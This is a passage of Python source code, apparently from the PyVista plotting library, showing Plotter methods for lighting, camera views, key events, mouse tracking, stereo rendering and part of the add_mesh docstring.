image = pl.last_image >>> type(image) # doctest:+SKIP <class 'numpy.ndarray'> """ return self._store_image @store_image.setter def store_image(self, value): """Store last rendered frame on close.""" self._store_image = bool(value) def subplot(self, index_row, index_column=None): """Set the active subplot. Parameters ---------- index_row : int Index of the subplot to activate along the rows. index_column : int Index of the subplot to activate along the columns. Examples -------- Create a 2 wide plot and set the background of right-hand plot to orange. Add a cube to the left plot and a sphere to the right. >>> import pyvista >>> pl = pyvista.Plotter(shape=(1, 2)) >>> actor = pl.add_mesh(pyvista.Cube()) >>> pl.subplot(0, 1) >>> actor = pl.add_mesh(pyvista.Sphere()) >>> pl.set_background('orange', all_renderers=False) >>> pl.show() """ self.renderers.set_active_renderer(index_row, index_column) @wraps(Renderer.add_legend) def add_legend(self, *args, **kwargs): """Wrap ``Renderer.add_legend``.""" return self.renderer.add_legend(*args, **kwargs) @wraps(Renderer.remove_legend) def remove_legend(self, *args, **kwargs): """Wrap ``Renderer.remove_legend``.""" return self.renderer.remove_legend(*args, **kwargs) @property def legend(self): """Legend actor. There can only be one legend actor per renderer. If ``legend`` is ``None``, there is no legend actor. """ return self.renderer.legend @wraps(Renderer.add_floor) def add_floor(self, *args, **kwargs): """Wrap ``Renderer.add_floor``.""" return self.renderer.add_floor(*args, **kwargs) @wraps(Renderer.remove_floors) def remove_floors(self, *args, **kwargs): """Wrap ``Renderer.remove_floors``.""" return self.renderer.remove_floors(*args, **kwargs) def enable_3_lights(self, only_active=False): """Enable 3-lights illumination. This will replace all pre-existing lights in the scene. 
        Parameters
        ----------
        only_active : bool
            If ``True``, only change the active renderer. The default
            is that every renderer is affected.

        Examples
        --------
        >>> from pyvista import demos
        >>> pl = demos.orientation_plotter()
        >>> pl.enable_3_lights()
        >>> pl.show()

        Note how this varies from the default plotting.

        >>> pl = demos.orientation_plotter()
        >>> pl.show()

        """
        def _to_pos(elevation, azimuth):
            theta = azimuth * np.pi / 180.0
            phi = (90.0 - elevation) * np.pi / 180.0
            x = np.sin(theta) * np.sin(phi)
            y = np.cos(phi)
            z = np.cos(theta) * np.sin(phi)
            return x, y, z

        renderers = [self.renderer] if only_active else self.renderers
        for renderer in renderers:
            renderer.remove_all_lights()

        # Inspired by Mayavi's version of Raymond Maple's 3-lights illumination
        intensities = [1, 0.6, 0.5]
        all_angles = [(45.0, 45.0), (-30.0, -60.0), (-30.0, 60.0)]
        for intensity, angles in zip(intensities, all_angles):
            light = pyvista.Light(light_type='camera light')
            light.intensity = intensity
            light.position = _to_pos(*angles)
            for renderer in renderers:
                renderer.add_light(light)

    def disable_3_lights(self):
        """Please use ``enable_lightkit``; this method has been deprecated."""
        from pyvista.core.errors import DeprecationError

        raise DeprecationError('DEPRECATED: Please use ``enable_lightkit``')

    def enable_lightkit(self, only_active=False):
        """Enable the default light-kit lighting.

        See:
        https://www.researchgate.net/publication/2926068

        This will replace all pre-existing lights in the renderer.

        Parameters
        ----------
        only_active : bool
            If ``True``, only change the active renderer. The default
            is that every renderer is affected.

        Examples
        --------
        Create a plotter without any lights and then enable the
        default light kit.

        >>> import pyvista
        >>> pl = pyvista.Plotter(lighting=None)
        >>> pl.enable_lightkit()
        >>> actor = pl.add_mesh(pyvista.Cube(), show_edges=True)
        >>> pl.show()

        """
        renderers = [self.renderer] if only_active else self.renderers

        light_kit = _vtk.vtkLightKit()
        for renderer in renderers:
            renderer.remove_all_lights()
            # Use the renderer as a vtkLightKit parser.
            # Feed it the LightKit, pop off the vtkLights, put back
            # pyvista Lights. This is the price we must pay for using
            # inheritance rather than composition.
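            # The kit first fills the renderer with plain vtkLight objects;
            # those are then pulled back out, wrapped as pyvista.Light
            # instances, and re-added so they can be driven through the
            # pyvista lighting API.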
light_kit.AddLightsToRenderer(renderer) vtk_lights = renderer.lights renderer.remove_all_lights() for vtk_light in vtk_lights: light = pyvista.Light.from_vtk(vtk_light) renderer.add_light(light) renderer.LightFollowCameraOn() @wraps(Renderer.enable_anti_aliasing) def enable_anti_aliasing(self, *args, **kwargs): """Wrap ``Renderer.enable_anti_aliasing``.""" for renderer in self.renderers: renderer.enable_anti_aliasing(*args, **kwargs) @wraps(Renderer.disable_anti_aliasing) def disable_anti_aliasing(self, *args, **kwargs): """Wrap ``Renderer.disable_anti_aliasing``.""" self.renderer.disable_anti_aliasing(*args, **kwargs) @wraps(Renderer.set_focus) def set_focus(self, *args, render=True, **kwargs): """Wrap ``Renderer.set_focus``.""" log.debug('set_focus: %s, %s', str(args), str(kwargs)) self.renderer.set_focus(*args, **kwargs) if render: self.render() @wraps(Renderer.set_position) def set_position(self, *args, render=True, **kwargs): """Wrap ``Renderer.set_position``.""" self.renderer.set_position(*args, **kwargs) if render: self.render() @wraps(Renderer.set_viewup) def set_viewup(self, *args, render=True, **kwargs): """Wrap ``Renderer.set_viewup``.""" self.renderer.set_viewup(*args, **kwargs) if render: self.render() @wraps(Renderer.add_orientation_widget) def add_orientation_widget(self, *args, **kwargs): """Wrap ``Renderer.add_orientation_widget``.""" return self.renderer.add_orientation_widget(*args, **kwargs) @wraps(Renderer.add_axes) def add_axes(self, *args, **kwargs): """Wrap ``Renderer.add_axes``.""" return self.renderer.add_axes(*args, **kwargs) @wraps(Renderer.hide_axes) def hide_axes(self, *args, **kwargs): """Wrap ``Renderer.hide_axes``.""" return self.renderer.hide_axes(*args, **kwargs) @wraps(Renderer.show_axes) def show_axes(self, *args, **kwargs): """Wrap ``Renderer.show_axes``.""" return self.renderer.show_axes(*args, **kwargs) @wraps(Renderer.update_bounds_axes) def update_bounds_axes(self, *args, **kwargs): """Wrap ``Renderer.update_bounds_axes``.""" return self.renderer.update_bounds_axes(*args, **kwargs) @wraps(Renderer.add_chart) def add_chart(self, *args, **kwargs): """Wrap ``Renderer.add_chart``.""" return self.renderer.add_chart(*args, **kwargs) @wraps(Renderer.remove_chart) def remove_chart(self, *args, **kwargs): """Wrap ``Renderer.remove_chart``.""" return self.renderer.remove_chart(*args, **kwargs) @wraps(Renderer.add_actor) def add_actor(self, *args, **kwargs): """Wrap ``Renderer.add_actor``.""" return self.renderer.add_actor(*args, **kwargs) @wraps(Renderer.enable_parallel_projection) def enable_parallel_projection(self, *args, **kwargs): """Wrap ``Renderer.enable_parallel_projection``.""" return self.renderer.enable_parallel_projection(*args, **kwargs) @wraps(Renderer.disable_parallel_projection) def disable_parallel_projection(self, *args, **kwargs): """Wrap ``Renderer.disable_parallel_projection``.""" return self.renderer.disable_parallel_projection(*args, **kwargs) @wraps(Renderer.enable_shadows) def enable_shadows(self, *args, **kwargs): """Wrap ``Renderer.enable_shadows``.""" return self.renderer.enable_shadows(*args, **kwargs) @wraps(Renderer.disable_shadows) def disable_shadows(self, *args, **kwargs): """Wrap ``Renderer.disable_shadows``.""" return self.renderer.disable_shadows(*args, **kwargs) @property def parallel_projection(self): """Return parallel projection state of active render window.""" return self.renderer.parallel_projection @parallel_projection.setter def parallel_projection(self, state): """Set parallel projection state of all active 
render windows.""" self.renderer.parallel_projection = state @property def parallel_scale(self): """Return parallel scale of active render window.""" return self.renderer.parallel_scale @parallel_scale.setter def parallel_scale(self, value): """Set parallel scale of all active render windows.""" self.renderer.parallel_scale = value @wraps(Renderer.add_axes_at_origin) def add_axes_at_origin(self, *args, **kwargs): """Wrap ``Renderer.add_axes_at_origin``.""" return self.renderer.add_axes_at_origin(*args, **kwargs) @wraps(Renderer.show_bounds) def show_bounds(self, *args, **kwargs): """Wrap ``Renderer.show_bounds``.""" return self.renderer.show_bounds(*args, **kwargs) @wraps(Renderer.add_bounding_box) def add_bounding_box(self, *args, **kwargs): """Wrap ``Renderer.add_bounding_box``.""" return self.renderer.add_bounding_box(*args, **kwargs) @wraps(Renderer.remove_bounding_box) def remove_bounding_box(self, *args, **kwargs): """Wrap ``Renderer.remove_bounding_box``.""" return self.renderer.remove_bounding_box(*args, **kwargs) @wraps(Renderer.remove_bounds_axes) def remove_bounds_axes(self, *args, **kwargs): """Wrap ``Renderer.remove_bounds_axes``.""" return self.renderer.remove_bounds_axes(*args, **kwargs) @wraps(Renderer.show_grid) def show_grid(self, *args, **kwargs): """Wrap ``Renderer.show_grid``.""" return self.renderer.show_grid(*args, **kwargs) @wraps(Renderer.set_scale) def set_scale(self, *args, **kwargs): """Wrap ``Renderer.set_scale``.""" return self.renderer.set_scale(*args, **kwargs) @wraps(Renderer.enable_eye_dome_lighting) def enable_eye_dome_lighting(self, *args, **kwargs): """Wrap ``Renderer.enable_eye_dome_lighting``.""" return self.renderer.enable_eye_dome_lighting(*args, **kwargs) @wraps(Renderer.disable_eye_dome_lighting) def disable_eye_dome_lighting(self, *args, **kwargs): """Wrap ``Renderer.disable_eye_dome_lighting``.""" self.renderer.disable_eye_dome_lighting(*args, **kwargs) @wraps(Renderer.reset_camera) def reset_camera(self, *args, **kwargs): """Wrap ``Renderer.reset_camera``.""" self.renderer.reset_camera(*args, **kwargs) self.render() @wraps(Renderer.isometric_view) def isometric_view(self, *args, **kwargs): """Wrap ``Renderer.isometric_view``.""" self.renderer.isometric_view(*args, **kwargs) @wraps(Renderer.view_isometric) def view_isometric(self, *args, **kwarg): """Wrap ``Renderer.view_isometric``.""" self.renderer.view_isometric(*args, **kwarg) @wraps(Renderer.view_vector) def view_vector(self, *args, **kwarg): """Wrap ``Renderer.view_vector``.""" self.renderer.view_vector(*args, **kwarg) @wraps(Renderer.view_xy) def view_xy(self, *args, **kwarg): """Wrap ``Renderer.view_xy``.""" self.renderer.view_xy(*args, **kwarg) @wraps(Renderer.view_yx) def view_yx(self, *args, **kwarg): """Wrap ``Renderer.view_yx``.""" self.renderer.view_yx(*args, **kwarg) @wraps(Renderer.view_xz) def view_xz(self, *args, **kwarg): """Wrap ``Renderer.view_xz``.""" self.renderer.view_xz(*args, **kwarg) @wraps(Renderer.view_zx) def view_zx(self, *args, **kwarg): """Wrap ``Renderer.view_zx``.""" self.renderer.view_zx(*args, **kwarg) @wraps(Renderer.view_yz) def view_yz(self, *args, **kwarg): """Wrap ``Renderer.view_yz``.""" self.renderer.view_yz(*args, **kwarg) @wraps(Renderer.view_zy) def view_zy(self, *args, **kwarg): """Wrap ``Renderer.view_zy``.""" self.renderer.view_zy(*args, **kwarg) @wraps(Renderer.disable) def disable(self, *args, **kwarg): """Wrap ``Renderer.disable``.""" self.renderer.disable(*args, **kwarg) @wraps(Renderer.enable) def enable(self, *args, **kwarg): """Wrap 
``Renderer.enable``.""" self.renderer.enable(*args, **kwarg) @wraps(Renderer.enable_depth_peeling) def enable_depth_peeling(self, *args, **kwargs): """Wrap ``Renderer.enable_depth_peeling``.""" if hasattr(self, 'ren_win'): result = self.renderer.enable_depth_peeling(*args, **kwargs) if result: self.ren_win.AlphaBitPlanesOn() return result @wraps(Renderer.disable_depth_peeling) def disable_depth_peeling(self): """Wrap ``Renderer.disable_depth_peeling``.""" if hasattr(self, 'ren_win'): self.ren_win.AlphaBitPlanesOff() return self.renderer.disable_depth_peeling() @wraps(Renderer.get_default_cam_pos) def get_default_cam_pos(self, *args, **kwargs): """Wrap ``Renderer.get_default_cam_pos``.""" return self.renderer.get_default_cam_pos(*args, **kwargs) @wraps(Renderer.remove_actor) def remove_actor(self, *args, **kwargs): """Wrap ``Renderer.remove_actor``.""" for renderer in self.renderers: renderer.remove_actor(*args, **kwargs) return True @wraps(Renderer.set_environment_texture) def set_environment_texture(self, *args, **kwargs): """Wrap ``Renderer.set_environment_texture``.""" return self.renderer.set_environment_texture(*args, **kwargs) #### Properties from Renderer #### @property def camera(self): """Return the active camera of the active renderer.""" if not self.camera_set: self.camera_position = self.get_default_cam_pos() self.reset_camera() self.camera_set = True return self.renderer.camera @camera.setter def camera(self, camera): """Set the active camera for the rendering scene.""" self.renderer.camera = camera @property def camera_set(self): """Return if the camera of the active renderer has been set.""" return self.renderer.camera_set @camera_set.setter def camera_set(self, is_set): """Set if the camera has been set on the active renderer.""" self.renderer.camera_set = is_set @property def bounds(self): """Return the bounds of the active renderer.""" return self.renderer.bounds @property def length(self): """Return the length of the diagonal of the bounding box of the scene.""" return self.renderer.length @property def center(self): """Return the center of the active renderer.""" return self.renderer.center @property def _scalar_bar_slots(self): """Return the scalar bar slots of the active renderer.""" return self.renderer._scalar_bar_slots @_scalar_bar_slots.setter def _scalar_bar_slots(self, value): """Set the scalar bar slots of the active renderer.""" self.renderer._scalar_bar_slots = value @property def _scalar_bar_slot_lookup(self): """Return the scalar bar slot lookup of the active renderer.""" return self.renderer._scalar_bar_slot_lookup @_scalar_bar_slot_lookup.setter def _scalar_bar_slot_lookup(self, value): """Set the scalar bar slot lookup of the active renderer.""" self.renderer._scalar_bar_slot_lookup = value @property def scale(self): """Return the scaling of the active renderer.""" return self.renderer.scale @scale.setter def scale(self, scale): """Set the scaling of the active renderer.""" self.renderer.set_scale(*scale) @property def camera_position(self): """Return camera position of the active render window.""" return self.renderer.camera_position @camera_position.setter def camera_position(self, camera_location): """Set camera position of the active render window.""" self.renderer.camera_position = camera_location @property def background_color(self): """Return the background color of the active render window.""" return self.renderers.active_renderer.background_color @background_color.setter def background_color(self, color): """Set the background color of all the 
render windows.""" self.set_background(color) @property def window_size(self): """Return the render window size in ``(width, height)``. Examples -------- Change the window size from ``200 x 200`` to ``400 x 400``. >>> import pyvista >>> pl = pyvista.Plotter(window_size=[200, 200]) >>> pl.window_size [200, 200] >>> pl.window_size = [400, 400] >>> pl.window_size [400, 400] """ return list(self.ren_win.GetSize()) @window_size.setter def window_size(self, window_size): """Set the render window size.""" self.ren_win.SetSize(window_size[0], window_size[1]) @property def image_depth(self): """Return a depth image representing current render window. Helper attribute for ``get_image_depth``. """ return self.get_image_depth() def _check_rendered(self): """Check if the render window has been shown and raise an exception if not.""" if not self._rendered: raise AttributeError( '\nThis plotter has not yet been set up and rendered ' 'with ``show()``.\n' 'Consider setting ``off_screen=True`` ' 'for off screen rendering.\n' ) def _check_has_ren_win(self): """Check if render window attribute exists and raise an exception if not.""" if not hasattr(self, 'ren_win'): raise AttributeError( '\n\nTo retrieve an image after the render window ' 'has been closed, set:\n\n' ' ``plotter.store_image = True``\n\n' 'before closing the plotter.' ) @property def image(self): """Return an image array of current render window. To retrieve an image after the render window has been closed, set: ``plotter.store_image = True`` before closing the plotter. """ if not hasattr(self, 'ren_win') and self.last_image is not None: return self.last_image self._check_rendered() self._check_has_ren_win() data = image_from_window(self.ren_win) if self.image_transparent_background: return data # ignore alpha channel return data[:, :, :-1] def render(self): """Render the main window. Does nothing until ``show`` has been called. """ if hasattr(self, 'ren_win') and not self._first_time: log.debug('Rendering') self.ren_win.Render() self._rendered = True @wraps(RenderWindowInteractor.add_key_event) def add_key_event(self, *args, **kwargs): """Wrap RenderWindowInteractor.add_key_event.""" if hasattr(self, 'iren'): self.iren.add_key_event(*args, **kwargs) def clear_events_for_key(self, key): """Remove the callbacks associated to the key. Parameters ---------- key : str Key to clear events for. """ self.iren.clear_events_for_key(key) def store_mouse_position(self, *args): """Store mouse position.""" if not hasattr(self, "iren"): raise AttributeError("This plotting window is not interactive.") self.mouse_position = self.iren.get_event_position() def store_click_position(self, *args): """Store click position in viewport coordinates.""" if not hasattr(self, "iren"): raise AttributeError("This plotting window is not interactive.") self.click_position = self.iren.get_event_position() self.mouse_position = self.click_position def track_mouse_position(self): """Keep track of the mouse position. This will potentially slow down the interactor. No callbacks supported here - use :func:`pyvista.BasePlotter.track_click_position` instead. 
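
        Examples
        --------
        A minimal sketch: ``auto_close=False`` keeps the plotter alive
        so the stored position can be read back after interacting with
        the window.

        >>> import pyvista
        >>> pl = pyvista.Plotter()
        >>> _ = pl.add_mesh(pyvista.Sphere())
        >>> pl.track_mouse_position()
        >>> pl.show(auto_close=False)  # doctest:+SKIP
        >>> pl.mouse_position  # doctest:+SKIP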
""" self.iren.track_mouse_position(self.store_mouse_position) def untrack_mouse_position(self): """Stop tracking the mouse position.""" self.iren.untrack_mouse_position() @wraps(RenderWindowInteractor.track_click_position) def track_click_position(self, *args, **kwargs): """Wrap RenderWindowInteractor.track_click_position.""" self.iren.track_click_position(*args, **kwargs) @wraps(RenderWindowInteractor.untrack_click_position) def untrack_click_position(self, *args, **kwargs): """Stop tracking the click position.""" self.iren.untrack_click_position(*args, **kwargs) @property def pickable_actors(self): """Return or set the pickable actors. When setting, this will be the list of actors to make pickable. All actors not in the list will be made unpickable. If ``actors`` is ``None``, all actors will be made unpickable. Returns ------- list of vtk.vtkActors Examples -------- Add two actors to a :class:`pyvista.Plotter`, make one pickable, and then list the pickable actors. >>> import pyvista as pv >>> pl = pv.Plotter() >>> sphere_actor = pl.add_mesh(pv.Sphere()) >>> cube_actor = pl.add_mesh(pv.Cube(), pickable=False, style='wireframe') >>> len(pl.pickable_actors) 1 Set the pickable actors to both actors. >>> pl.pickable_actors = [sphere_actor, cube_actor] >>> len(pl.pickable_actors) 2 Set the pickable actors to ``None``. >>> pl.pickable_actors = None >>> len(pl.pickable_actors) 0 """ pickable = [] for renderer in self.renderers: for actor in renderer.actors.values(): if actor.GetPickable(): pickable.append(actor) return pickable @pickable_actors.setter def pickable_actors(self, actors=None): """Set the pickable actors.""" actors = [] if actors is None else actors if isinstance(actors, _vtk.vtkActor): actors = [actors] if not all([isinstance(actor, _vtk.vtkActor) for actor in actors]): raise TypeError( f'Expected a vtkActor instance or a list of vtkActors, got ' f'{[type(actor) for actor in actors]} instead.' ) for renderer in self.renderers: for actor in renderer.actors.values(): actor.SetPickable(actor in actors) def _prep_for_close(self): """Make sure a screenshot is acquired before closing. This doesn't actually close anything! It just preps the plotter for closing. """ # Grab screenshot right before renderer closes self.last_image = self.screenshot(True, return_img=True) self.last_image_depth = self.get_image_depth() def increment_point_size_and_line_width(self, increment): """Increment point size and line width of all actors. For every actor in the scene, increment both its point size and line width by the given value. Parameters ---------- increment : float Amount to increment point size and line width. 
""" for renderer in self.renderers: for actor in renderer._actors.values(): if hasattr(actor, "GetProperty"): prop = actor.GetProperty() if hasattr(prop, "SetPointSize"): prop.SetPointSize(prop.GetPointSize() + increment) if hasattr(prop, "SetLineWidth"): prop.SetLineWidth(prop.GetLineWidth() + increment) self.render() return def reset_key_events(self): """Reset all of the key press events to their defaults.""" if hasattr(self, 'iren'): self.iren.clear_key_event_callbacks() self.add_key_event('q', self._prep_for_close) # Add no matter what b_left_down_callback = lambda: self.iren.add_observer( 'LeftButtonPressEvent', self.left_button_down ) self.add_key_event('b', b_left_down_callback) self.add_key_event('v', lambda: self.isometric_view_interactive()) self.add_key_event('C', lambda: self.enable_cell_picking()) self.add_key_event('Up', lambda: self.camera.Zoom(1.05)) self.add_key_event('Down', lambda: self.camera.Zoom(0.95)) self.add_key_event('plus', lambda: self.increment_point_size_and_line_width(1)) self.add_key_event('minus', lambda: self.increment_point_size_and_line_width(-1)) @wraps(RenderWindowInteractor.key_press_event) def key_press_event(self, *args, **kwargs): """Wrap RenderWindowInteractor.key_press_event.""" self.iren.key_press_event(*args, **kwargs) def left_button_down(self, obj, event_type): """Register the event for a left button down click.""" if hasattr(self.ren_win, 'GetOffScreenFramebuffer'): if not self.ren_win.GetOffScreenFramebuffer().GetFBOIndex(): # must raise a runtime error as this causes a segfault on VTK9 raise ValueError('Invoking helper with no framebuffer') # Get 2D click location on window click_pos = self.iren.get_event_position() # Get corresponding click location in the 3D plot picker = _vtk.vtkWorldPointPicker() picker.Pick(click_pos[0], click_pos[1], 0, self.renderer) self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3)) if np.any(np.isnan(self.pickpoint)): self.pickpoint[:] = 0 @wraps(RenderWindowInteractor.enable_trackball_style) def enable_trackball_style(self): """Wrap RenderWindowInteractor.enable_trackball_style.""" self.iren.enable_trackball_style() @wraps(RenderWindowInteractor.enable_trackball_actor_style) def enable_trackball_actor_style(self): """Wrap RenderWindowInteractor.enable_trackball_actor_style.""" self.iren.enable_trackball_actor_style() @wraps(RenderWindowInteractor.enable_image_style) def enable_image_style(self): """Wrap RenderWindowInteractor.enable_image_style.""" self.iren.enable_image_style() @wraps(RenderWindowInteractor.enable_joystick_style) def enable_joystick_style(self): """Wrap RenderWindowInteractor.enable_joystick_style.""" self.iren.enable_joystick_style() @wraps(RenderWindowInteractor.enable_joystick_actor_style) def enable_joystick_actor_style(self): """Wrap RenderWindowInteractor.enable_joystick_actor_style.""" self.iren.enable_joystick_actor_style() @wraps(RenderWindowInteractor.enable_zoom_style) def enable_zoom_style(self): """Wrap RenderWindowInteractor.enable_zoom_style.""" self.iren.enable_zoom_style() @wraps(RenderWindowInteractor.enable_terrain_style) def enable_terrain_style(self, *args, **kwargs): """Wrap RenderWindowInteractor.enable_terrain_style.""" self.iren.enable_terrain_style(*args, **kwargs) @wraps(RenderWindowInteractor.enable_rubber_band_style) def enable_rubber_band_style(self): """Wrap RenderWindowInteractor.enable_rubber_band_style.""" self.iren.enable_rubber_band_style() @wraps(RenderWindowInteractor.enable_rubber_band_2d_style) def enable_rubber_band_2d_style(self): 
"""Wrap RenderWindowInteractor.enable_rubber_band_2d_style.""" self.iren.enable_rubber_band_2d_style() def enable_stereo_render(self): """Enable stereo rendering. Disable this with :func:`disable_stereo_render <BasePlotter.disable_stereo_render>` Examples -------- Enable stereo rendering to show a cube as an anaglyph image. >>> import pyvista as pv >>> pl = pv.Plotter() >>> _ = pl.add_mesh(pv.Cube()) >>> pl.enable_stereo_render() >>> pl.show() """ if hasattr(self, 'ren_win'): self.ren_win.StereoRenderOn() self.ren_win.SetStereoTypeToAnaglyph() def disable_stereo_render(self): """Disable stereo rendering. Enable again with :func:`enable_stereo_render <BasePlotter.enable_stereo_render>` Examples -------- Enable and then disable stereo rendering. It should show a simple cube. >>> import pyvista as pv >>> pl = pv.Plotter() >>> _ = pl.add_mesh(pv.Cube()) >>> pl.enable_stereo_render() >>> pl.disable_stereo_render() >>> pl.show() """ if hasattr(self, 'ren_win'): self.ren_win.StereoRenderOff() def hide_axes_all(self): """Hide the axes orientation widget in all renderers.""" for renderer in self.renderers: renderer.hide_axes() def show_axes_all(self): """Show the axes orientation widget in all renderers.""" for renderer in self.renderers: renderer.show_axes() def isometric_view_interactive(self): """Set the current interactive render window to isometric view.""" interactor = self.iren.get_interactor_style() renderer = interactor.GetCurrentRenderer() if renderer is None: renderer = self.renderer renderer.view_isometric() def update(self, stime=1, force_redraw=True): """Update window, redraw, process messages query. Parameters ---------- stime : int, optional Duration of timer that interrupt vtkRenderWindowInteractor in milliseconds. force_redraw : bool, optional Call ``render`` immediately. """ if stime <= 0: stime = 1 curr_time = time.time() if Plotter.last_update_time > curr_time: Plotter.last_update_time = curr_time if self.iren is not None: update_rate = self.iren.get_desired_update_rate() if (curr_time - Plotter.last_update_time) > (1.0 / update_rate): self.right_timer_id = self.iren.create_repeating_timer(stime) self.render() Plotter.last_update_time = curr_time return if force_redraw: self.render() def add_mesh( self, mesh, color=None, style=None, scalars=None, clim=None, show_edges=None, edge_color=None, point_size=5.0, line_width=None, opacity=1.0, flip_scalars=False, lighting=None, n_colors=256, interpolate_before_map=True, cmap=None, label=None, reset_camera=None, scalar_bar_args=None, show_scalar_bar=None, multi_colors=False, name=None, texture=None, render_points_as_spheres=None, render_lines_as_tubes=False, smooth_shading=None, split_sharp_edges=False, ambient=0.0, diffuse=1.0, specular=0.0, specular_power=100.0, nan_color=None, nan_opacity=1.0, culling=None, rgb=None, categories=False, silhouette=False, use_transparency=False, below_color=None, above_color=None, annotations=None, pickable=True, preference="point", log_scale=False, pbr=False, metallic=0.0, roughness=0.5, render=True, component=None, **kwargs, ): """Add any PyVista/VTK mesh or dataset that PyVista can wrap to the scene. This method is using a mesh representation to view the surfaces and/or geometry of datasets. For volume rendering, see :func:`pyvista.BasePlotter.add_volume`. Parameters ---------- mesh : pyvista.DataSet or pyvista.MultiBlock Any PyVista or VTK mesh is supported. Also, any dataset that :func:`pyvista.wrap` can handle including NumPy arrays of XYZ points. 
color : color_like, optional, defaults to white Use to make the entire mesh have a single solid color. Either a string, RGB list, or hex color string. For example: ``color='white'``, ``color='w'``, ``color=[1.0, 1.0, 1.0]``, or ``color='#FFFFFF'``. Color will be overridden if scalars are specified. style : str, optional Visualization style of the mesh. One of the following: ``style='surface'``, ``style='wireframe'``, ``style='points'``. Defaults to ``'surface'``. Note that ``'wireframe'`` only shows a wireframe of the outer geometry. scalars : str or numpy.ndarray, optional Scalars used to "color" the mesh. Accepts a string name of an array that is present on the mesh or an array equal to the number of cells or the number of points in the mesh. Array should be sized as a single vector. If both ``color`` and ``scalars`` are ``None``, then the active scalars are used. clim : 2 item list, optional Color bar range for scalars. Defaults to minimum and maximum of scalars array. Example: ``[-1, 2]``. ``rng`` is also an accepted alias for this. show_edges : bool, optional Shows the edges of a mesh. Does not apply to a wireframe representation. edge_color : color_like, optional, defaults to black The solid color to give the edges when ``show_edges=True``. Either a string, RGB list, or hex color string. point_size : float, optional Point size of any nodes in the dataset plotted. Also applicable when style='points'. Default ``5.0``. line_width : float, optional Thickness of lines. Only valid for wireframe and surface representations. Default None. opacity : float, str, array-like Opacity of the mesh. If a single float value is given, it will be the global opacity of the mesh and uniformly applied everywhere - should be between 0 and 1. A string can also be specified to map the scalars range to a predefined opacity transfer function (options include: ``'linear'``, ``'linear_r'``, ``'geom'``, ``'geom_r'``). A string could also be used to map a scalars array from the mesh to the opacity (must have same number of elements as the ``scalars`` argument). Or you can pass a custom made transfer function that is an array either ``n_colors`` in length or shorter. flip_scalars : bool, optional Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do this as well. lighting : bool, optional Enable or disable view direction lighting. Default ``False``. n_colors : int, optional Number of colors to use when displaying scalars. Defaults to 256. The scalar bar will also have this many colors. interpolate_before_map : bool, optional Enabling makes for a smoother scalars display. Default is ``True``. When ``False``, OpenGL will interpolate the mapped colors which can result is showing colors that are not present in the color map. cmap : str, list, optional Name of the Matplotlib colormap to use when mapping the ``scalars``. See available Matplotlib colormaps. Only applicable for when displaying ``scalars``. Requires Matplotlib to be installed. ``colormap`` is also an accepted alias for this. If ``colorcet`` or ``cmocean`` are installed, their colormaps can be specified by name. You can also specify a list of colors to override an existing colormap with a custom one. For example, to create a three color colormap you might specify ``['green', 'red', 'blue']``. label : str, optional String label to use when adding a legend to the scene with :func:`pyvista.BasePlotter.add_legend`. reset_camera : bool, optional Reset the camera after adding this mesh to the scene. 
scalar_bar_args : dict, optional Dictionary of keyword arguments to pass when adding the scalar bar to the scene. For options, see :func:`pyvista.BasePlotter.add_scalar_bar`. show_scalar_bar : bool If ``False``, a scalar bar will not be added to the scene. Defaults to ``True``. multi_colors : bool, optional If a ``MultiBlock`` dataset is given this will color each block by a solid color using matplotlib's color cycler. name : str, optional The name for the added mesh/actor so that it can be easily updated. If an actor of this name already exists in the rendering window, it will be replaced by the new actor. texture : vtk.vtkTexture or np.ndarray or bool, optional A texture to apply if the input mesh has texture coordinates. This will not work with MultiBlock datasets. If set to ``True``, the first available texture on the object will be used. If a string name is given, it will pull a texture with that name associated to the input mesh. render_points_as_spheres : bool, optional Render points as spheres rather than dots. render_lines_as_tubes : bool, optional Show lines as thick tubes rather than flat lines. Control the width with ``line_width``. smooth_shading : bool, optional Enable smooth shading when ``True`` using either the Gouraud or Phong shading algorithm. When ``False``, use flat shading. Automatically enabled when ``pbr=True``. See :ref:`shading_example`. split_sharp_edges : bool, optional Split sharp edges exceeding 30 degrees when plotting with smooth shading. Control the angle with the optional keyword argument ``feature_angle``. By default this is ``False``. Note that enabling this will create a copy of the input mesh within the plotter. See :ref:`shading_example`. ambient : float, optional When lighting is enabled, this is the amount of light in the range of 0 to 1 (default 0.0) that reaches the actor when not directed at the light source emitted from the viewer. diffuse : float, optional The diffuse lighting coefficient. Default 1.0. specular : float, optional The specular lighting coefficient. Default 0.0. specular_power : float, optional The specular power. Between 0.0 and 128.0. nan_color : color_like, optional, defaults to gray The color to use for all ``NaN`` values in the plotted scalar array. nan_opacity : float, optional Opacity of ``NaN`` values. Should be between 0 and 1. Default 1.0. culling : str, optional Does not render faces that are culled. Options are ``'front'`` or ``'back'``. This can be helpful for dense surface meshes, especially when edges are visible, but can cause flat meshes to be partially displayed. Defaults to ``False``. rgb : bool, optional If an 2 dimensional array is passed as the scalars, plot those values as RGB(A) colors. ``rgba`` is also an accepted alias for this. Opacity (the A) is optional. If a scalars array ending with ``"_rgba"`` is passed, the default becomes ``True``. This can be overridden by setting this parameter to ``False``. categories : bool, optional If set to ``True``, then the number of unique values in the scalar array will be used as the ``n_colors`` argument. silhouette : dict, bool, optional If set to ``True``, plot a silhouette highlight for the mesh. This feature is only available for a triangulated ``PolyData``. 
            As a ``dict``, it contains the properties of the silhouette to
            display:

                * ``color``: ``color_like``, color of the silhouette
                * ``line_width``: ``float``, edge width
                * ``opacity``: ``float`` between 0 and 1, edge transparency
                * ``feature_angle``: If a ``float``, display sharp edges
                  exceeding that angle in degrees.
                * ``decimate``: ``float`` between 0 and 1, level of decimation

        use_transparency : bool, optional
            Invert the opacity mappings and make the values correspond
            to transparency.

        below_color : color_like, optional
            Solid color for values below the scalars range (``clim``).
            This will automatically set the scalar bar ``below_label``
            to ``'Below'``.

        above_color : color_like, optional
            Solid color for values above the scalars range (``clim``).
            This will automatically set the scalar bar ``above_label``
            to ``'Above'``.

        annotations : dict, optional
            Pass a dictionary of annotations. Keys are the float
            values in the scalars range to annotate on the scalar bar
            and the values are the string annotations.

        pickable : bool, optional
            Set whether this actor is pickable.

        preference : str, optional
            When ``mesh.n_points == mesh.n_cells`` and setting
            scalars, this parameter sets how the scalars will be
            mapped to the mesh.  Default ``'point'``, which causes the
            scalars to be associated with the mesh points.  Can be
            either ``'point'`` or ``'cell'``.

        log_scale : bool, optional
            Use log scale when mapping data to colors. Scalars less
            than zero are mapped to the smallest representable
